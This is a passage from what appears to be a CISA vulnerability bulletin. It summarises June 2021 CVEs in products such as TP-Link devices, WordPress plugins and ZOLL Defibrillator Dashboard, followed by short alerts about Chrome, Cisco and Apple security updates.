tp-link — tl-wpa4220 TP-Link’s TL-WPA4220 4.0.2 Build 20180308 Rel.37064 does not use SSL by default. Attacker on the local network can monitor traffic and capture the cookie and other sensitive information. 2021-06-15 not yet calculated CVE-2021-28858
MISC
tp-link — tl-wpa4220
 
TP-Link’s TL-WPA4220 4.0.2 Build 20180308 Rel.37064 username and password are sent via the cookie. 2021-06-15 not yet calculated CVE-2021-28857
MISC
trend_micro — interscan_web_security_virtual_appliance
 
Trend Micro InterScan Web Security Virtual Appliance version 6.5 was found to have a reflected cross-site scripting (XSS) vulnerability in the product’s Captive Portal. 2021-06-17 not yet calculated CVE-2021-31521
MISC
trendnet — tw100-s4w1ca
 
In TrendNet TW100-S4W1CA 2.3.32, due to a lack of proper session controls, a threat actor could make unauthorized changes to an affected router via a specially crafted web page. If an authenticated user were to interact with a malicious web page it could allow for a complete takeover of the router. 2021-06-17 not yet calculated CVE-2021-32424
MISC
trendnet — tw100-s4w1ca
 
In TrendNet TW100-S4W1CA 2.3.32, it is possible to inject arbitrary JavaScript into the router’s web interface via the “echo” command. 2021-06-17 not yet calculated CVE-2021-32426
MISC
ubuntu — ubuntu It was discovered that the get_modified_conffiles() function in backends/packaging-apt-dpkg.py allowed injecting modified package names in a manner that would confuse the dpkg(1) call. 2021-06-12 not yet calculated CVE-2021-32556
MISC
unegg — unegg
 
UnEGG v0.5 and eariler versions have a Integer overflow vulnerability, triggered when the user opens a malformed specific file that is mishandled by UnEGG. Attackers could exploit this and arbitrary code execution. This issue affects: Estsoft UnEGG 0.5 versions prior to 1.0 on linux. 2021-06-11 not yet calculated CVE-2020-7860
MISC
unifi_protect — g3_flex_camera_version
 
An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 not yet calculated CVE-2021-33818
MISC
MISC
MISC
unifi_protect — g3_flex_camera_version
 
An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67.Attacker could send a huge amount of TCP SYN packet to make web service’s resource exhausted. Then the web server is denial-of-service. 2021-06-18 not yet calculated CVE-2021-33820
MISC
MISC
MISC
valine — valine
 
Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version. 2021-06-16 not yet calculated CVE-2021-34801
MISC
veryfitpro — veryfitpro
 
The VeryFitPro (com.veryfit2hr.second) application 3.2.8 for Android does all communication with the backend API over cleartext HTTP. This includes logins, registrations, and password change requests. This allows information theft and account takeover via network sniffing. 2021-06-16 not yet calculated CVE-2021-32612
MISC
MISC
MISC
FULLDISC
vmware — tools
 
VMware Tools for Windows (11.x.y prior to 11.3.0) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest operating system, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest operating system. 2021-06-18 not yet calculated CVE-2021-21997
MISC
wagtail — wagtail
 
Wagtail is an open source content management system built on Django. A cross-site scripting vulnerability exists in versions 2.13-2.13.1, versions 2.12-2.12.4, and versions prior to 2.11.8. When the `{% include_block %}` template tag is used to output the value of a plain-text StreamField block (`CharBlock`, `TextBlock` or a similar user-defined block derived from `FieldBlock`), and that block does not specify a template for rendering, the tag output is not properly escaped as HTML. This could allow users to insert arbitrary HTML or scripting. This vulnerability is only exploitable by users with the ability to author StreamField content (i.e. users with ‘editor’ access to the Wagtail admin). Patched versions have been released as Wagtail 2.11.8 (for the LTS 2.11 branch), Wagtail 2.12.5, and Wagtail 2.13.2 (for the current 2.13 branch). As a workaround, site implementors who are unable to upgrade to a current supported version should audit their use of `{% include_block %}` to ensure it is not used to output `CharBlock` / `TextBlock` values with no associated template. Note that this only applies where `{% include_block %}` is used directly on that block (uses of `include_block` on a block _containing_ a CharBlock / TextBlock, such as a StructBlock, are unaffected). In these cases, the tag can be replaced with Django’s `{{ … }}` syntax – e.g. `{% include_block my_title_block %}` becomes `{{ my_title_block }}`. 2021-06-17 not yet calculated CVE-2021-32681
MISC
MISC
CONFIRM
MISC
wbu-systems — codemeter
 
A buffer over-read vulnerability exists in Wibu-Systems CodeMeter versions < 7.21a. An unauthenticated remote attacker can exploit this issue to disclose heap memory contents or crash the CodeMeter Runtime Server. 2021-06-16 not yet calculated CVE-2021-20093
MISC
MISC
wbu-systems — codemeter
 
A denial of service vulnerability exists in Wibu-Systems CodeMeter versions < 7.21a. An unauthenticated remote attacker can exploit this issue to crash the CodeMeter Runtime Server. 2021-06-16 not yet calculated CVE-2021-20094
MISC
MISC
wire — wire
 
wire-webapp is the web version of Wire, an open-source messenger. A cross-site scripting vulnerability exists in wire-webapp prior to version 2021-06-01-production.0. If a user is instructed to open an image in a new tab (right click -> open in new tab, or copy the URL and paste it in the URL bar), an the image payload is executed on the domain hosting the app (app.wire.com). In particular, if an image contains malicious code in addition to the actual picture, this code is executed on app.wire.com. This allows the attacker to fully control the user account. The vulnerability was patched in version 2021-06-01-production.0. As a workaround, users should not try to open image URLs. 2021-06-15 not yet calculated CVE-2021-32683
MISC
CONFIRM
wordpress — wordpress This Gallery from files WordPress plugin through 1.6.0 gives the functionality of uploading images to the server. But filenames are not properly sanitized before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of CSRF check, the attack could also be performed via such vector. 2021-06-14 not yet calculated CVE-2021-24349
CONFIRM
wordpress — wordpress The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension’s case, for example, from “php” to “pHP”. 2021-06-14 not yet calculated CVE-2021-24347
CONFIRM
wordpress — wordpress The Stock in & out WordPress plugin through 1.0.4 has a search functionality, the lowest accessible level to it being contributor. The srch POST parameter is not validated, sanitised or escaped before using it in the echo statement, leading to a reflected XSS issue 2021-06-14 not yet calculated CVE-2021-24346
CONFIRM
MISC
wordpress — wordpress In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, the lack of capability checks and insufficient nonce check on the AJAX actions, simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard, made it possible for authenticated users to retrieve and update the wildcard value for redirects. 2021-06-14 not yet calculated CVE-2021-24355
CONFIRM
MISC
wordpress — wordpress
 
The import_data function of the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4 had no capability or nonce checks making it possible for unauthenticated users to import a set of site redirects. 2021-06-14 not yet calculated CVE-2021-24353
CONFIRM
MISC
wordpress — wordpress
 
In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites. 2021-06-14 not yet calculated CVE-2021-24356
CONFIRM
MISC
wordpress — wordpress
 
The export_data function of the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4 had no capability or nonce checks making it possible for unauthenticated users to export a site’s redirects. 2021-06-14 not yet calculated CVE-2021-24352
CONFIRM
MISC
wordpress — wordpress
 
The Smart Slider 3 Free and pro WordPress plugins before 3.5.0.9 did not sanitise the Project Name before outputting it back in the page, leading to a Stored Cross-Site Scripting issue. By default, only administrator users could access the affected functionality, limiting the exploitability of the vulnerability. However, some WordPress admins may allow lesser privileged users to access the plugin’s functionality, in which case, privilege escalation could be performed. 2021-06-14 not yet calculated CVE-2021-24382
CONFIRM
MISC
wordpress — wordpress
 
When deleting a date in the Xllentech English Islamic Calendar WordPress plugin before 2.6.8, the year_number and month_number POST parameters are not sanitised, escaped or validated before being used in a SQL statement, leading to SQL injection. 2021-06-14 not yet calculated CVE-2021-24341
CONFIRM
MISC
wordpress — wordpress
 
The menu delete functionality of the Side Menu – add fixed side buttons WordPress plugin before 3.1.5, available to Administrator users takes the did GET parameter and uses it into an SQL statement without proper sanitisation, validation or escaping, therefore leading to a SQL Injection issue 2021-06-14 not yet calculated CVE-2021-24348
CONFIRM
MISC
wordpress — wordpress
 
The theplus_more_post AJAX action of The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.12 did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users) 2021-06-14 not yet calculated CVE-2021-24351
MISC
CONFIRM
wordpress — wordpress
 
A lack of capability checks and insufficient nonce check on the AJAX action in the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, made it possible for authenticated users to install arbitrary plugins on vulnerable sites. 2021-06-14 not yet calculated CVE-2021-24354
CONFIRM
MISC
wordpress — wordpress
 
The page lists-management feature of the Sendit WP Newsletter WordPress plugin through 2.5.1, available to Administrator users does not sanitise, validate or escape the id_lista POST parameter before using it in SQL statement, therefore leading to Blind SQL Injection. 2021-06-14 not yet calculated CVE-2021-24345
CONFIRM
MISC
wowonder — wowonder
 
In WoWonder 3.0.4, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day. 2021-06-11 not yet calculated CVE-2021-27200
MISC
MISC
MISC
zettlr — zettlr
 
No filtering of cross-site scripting (XSS) payloads in the markdown-editor in Zettlr 1.8.7 allows attackers to perform remote code execution via a crafted file. 2021-06-18 not yet calculated CVE-2021-26835
MISC
MISC
znote — znote
 
A cross-site scripting (XSS) vulnerability exists in Znote 0.5.2. An attacker can insert payloads, and the code execution will happen immediately on markdown view mode. 2021-06-18 not yet calculated CVE-2021-26834
MISC
MISC
zoho — manageengine_password_manager_pro
 
In Zoho ManageEngine Password Manager Pro before 11.1 build 11104, attackers are able to retrieve credentials via a browser extension for non-website resource types. 2021-06-16 not yet calculated CVE-2021-31857
MISC
CONFIRM
zoho — manageengine_servicedesk_plus
 
Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732. 2021-06-16 not yet calculated CVE-2021-31159
CONFIRM
MISC
MISC
zoll — defibrillator_dashboard ZOLL Defibrillator Dashboard, v prior to 2.2, The affected products contain credentials stored in plaintext. This could allow an attacker to gain access to sensitive information. 2021-06-16 not yet calculated CVE-2021-27487
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, v prior to 2.2,The affected product’s web application could allow a low privilege user to inject parameters to contain malicious scripts to be executed by higher privilege users. 2021-06-16 not yet calculated CVE-2021-27479
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, v prior to 2.2, The affected products utilize an encryption key in the data exchange process, which is hardcoded. This could allow an attacker to gain access to sensitive information. 2021-06-16 not yet calculated CVE-2021-27481
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, v prior to 2.2,The affected products contain insecure filesystem permissions that could allow a lower privilege user to escalate privileges to an administrative level user. 2021-06-16 not yet calculated CVE-2021-27483
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, v prior to 2.2,The application allows users to store their passwords in a recoverable format, which could allow an attacker to retrieve the credentials from the web browser. 2021-06-16 not yet calculated CVE-2021-27485
MISC
zoll — defibrillator_dashboard
 
ZOLL Defibrillator Dashboard, v prior to 2.2, The web application allows a non-administrative user to upload a malicious file. This file could allow an attacker to remotely execute arbitrary commands. 2021-06-16 not yet calculated CVE-2021-27489
MISC
zrlog — zrlog
 
A Cross-site scripting (XSS) vulnerability exists in the comment section in ZrLog 2.1.3, which allows remote attackers to inject arbitrary web script and stolen administrator cookies via the nickname parameter and gain access to the admin panel. 2021-06-15 not yet calculated CVE-2020-21316
MISC
MISC
MISC
zzipblib — zziplib
 
Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value “zzip_file_read” in the function “unzzip_cat_file”. 2021-06-18 not yet calculated CVE-2020-18442
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Google Releases Security Updates for Chrome

06/18/2021 07:05 AM EDT

Original release date: June 18, 2021

Google has released Chrome version 91.0.4472.114 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities—CVE-2021-30554—has been detected in exploits in the wild.

CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cisco Releases Security Updates for Multiple Products

06/17/2021 06:51 AM EDT

Original release date: June 17, 2021

Cisco has released security updates to address vulnerabilities in multiple Cisco products. An attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

CISA encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

Apple Releases Security Updates for iOS 12.5.4

06/15/2021 06:43 AM EDT

Original release date: June 15, 2021

Apple has released security updates to address vulnerabilities in iOS 12.5.4. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review the Apple security update and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.